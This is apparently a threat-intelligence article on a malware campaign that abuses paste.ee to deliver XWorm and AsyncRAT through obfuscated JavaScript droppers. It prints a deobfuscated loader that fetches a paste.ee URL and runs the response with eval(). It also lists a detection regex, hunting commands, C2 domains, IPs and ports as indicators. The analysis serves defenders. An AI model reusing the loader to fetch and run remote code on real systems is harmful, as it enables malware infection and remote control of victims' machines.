Paste.ee Misused as C&C Hub: XWorm & AsyncRAT Distribution Uncovered in Obfuscated Campaign

A recent investigation by cybersecurity researchers has revealed a highly stealthy malware distribution campaign abusing the legitimate paste.ee service as a command-and-control (C&C) hub.

The attackers use advanced obfuscation techniques in JavaScript droppers to deliver powerful remote access trojans (RATs) like XWorm and AsyncRAT, evading conventional security detection and complicating incident response efforts.

Obfuscated JavaScript Loader:

The attack chain begins with the distribution of weaponized JavaScript files. One such sample, disguised as “DOCUMENT FOR DELIVERY INFORMATION.js”, was uploaded to malware repositories and flagged due to behavioral markers reminiscent of RemcosRAT.

Obfuscation Mechanisms:

• Junk Unicode Insertion: The JavaScript loader inserts rare Unicode characters (such as ᙓೇᰖ∛ᩕዀ╬ᤳK⨀Ḣڑ⦝〒؅) throughout its strings and logic, making static analysis and detection challenging.
• String Reconstruction: These characters are removed at runtime to reconstruct key object names and URLs.

Network Communication:

• The dropper dynamically constructs a call to the MSXML2.XMLHTTP ActiveX object, initiating an HTTP GET request to an obfuscated paste.ee URL (e.g., http://paste.ee/d/s1uVin8i/0).
• The retrieved payload, typically more malicious code, is then executed via the JavaScript Function constructor.

Deobfuscated Loader Sample:

javascript// Pseudocode summary after removing junk Unicode and decoding logic
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "http://paste.ee/d/s1uVin8i/0", false);
xmlhttp.send();
eval(xmlhttp.responseText);

This loader model enables the adversary to swap payloads on demand simply by updating the paste at paste.ee—without altering the delivery infrastructure or initial dropper.

Infrastructure Analysis: From Paste.ee to RAT Command-and-Control

Malicious Paste.ee Usage

Researchers mapped a network of paste.ee URLs distributing encoded PE files, obfuscated scripts, and configuration data. Regex-based hunting revealed consistent patterns in malicious paste URLs (e.g., https:\/\/paste\.ee\/[a-z]\/[A-Za-z0-9]+\/0$), allowing defenders to programmatically extract and track related campaigns.

Extraction and Verification Process:

1. Pulling URLs from NDJSON:bashjq -r ".url" export.ndjson > urls.txt
2. Verifying Live Targets:bashhttpx -l urls.txt -mc 200 -o 200urls.txt
3. Malware Retrieval and Analysis:
   • Extracted PE files showed reverse encoding and encryption.
   • Decompilation and config decryption revealed XWorm activity and C2 details.

Command-and-Control (C2) Infrastructure

On decoding configuration data, primary C2 domains such as abuwire123[.]ddns[.]net emerged, resolving to IPs like 45.145.43.244 (Frankfurt, Germany, ASN: AS58212). The C2 network was found to span both Europe and the U.S., with notable async tunnels:

IP Address	Ports	Service	Certificate Label	First Seen
45.145.43.244	6606	XWorm C2	AsyncRAT	Feb 24, 2025
66.63.187.154	6606	AsyncRAT C2	AsyncRAT	Feb 2025
66.63.187.232	8808	XWorm C2	AsyncRAT	Feb 2025
196.251.118.41	8808	AsyncRAT C2	AsyncRAT	Feb 2025

Technical Capabilities of XWorm:

• Keylogging and Data Exfiltration: XWorm captures keystrokes system-wide, logs sensitive data, and exfiltrates it via AES-encrypted C2 channels.
• Persistence and Recon: It sends periodic PINGs containing user, system, and window information to ensure connectivity and enable surveillance.

AsyncRAT Characteristics:

• An open-source C# RAT, forked and customized by numerous threat actors.
• Supports robust backdoor access, live monitoring, file theft, and lateral movement.

Threat Indicators and Mitigation Strategies

Indicators of Compromise (IOCs)

IP Address	Domain	Hosting Company	Location
45.145.43.244	abuwire123[.]ddns[.]net	dataforest GmbH (ASN: AS58212)	Frankfurt, Germany
66.63.187.154	Not Available	QuadraNet Enterprises LLC	United States
66.63.187.232	abuwire123h[.]ddns[.]net abuwire123[.]duckdns[.]org	QuadraNet Enterprises LLC	United States
196.251.118.41	Not Available	Not Available	Not Available
23.186.113.60	paste.ee	Not Available	Not Available

Defensive Measures

• Block Paste Patterns: Proactively block paste.ee URLs matching known malicious regex patterns.
• Monitor Ports: Flag or restrict outbound connections to non-standard ports 6606, 7707, 8808.
• Behavioral Detection: Alert on processes invoking ActiveX XMLHTTP calls in scripts and on highly obfuscated JavaScript in user directories.
• Update and Audit: Ensure endpoint security solutions can flag suspicious scripts even if not known malware and regularly audit for network connections to IOCs.

The innovative misuse of paste.ee as a rapidly updatable C&C hub, combined with sophisticated JavaScript obfuscation and a dispersed C2 infrastructure, demonstrates the evolving tactics of modern malware actors. XWorm and AsyncRAT remain potent threats, and defenders must adapt with multi-layered detection and robust network hygiene.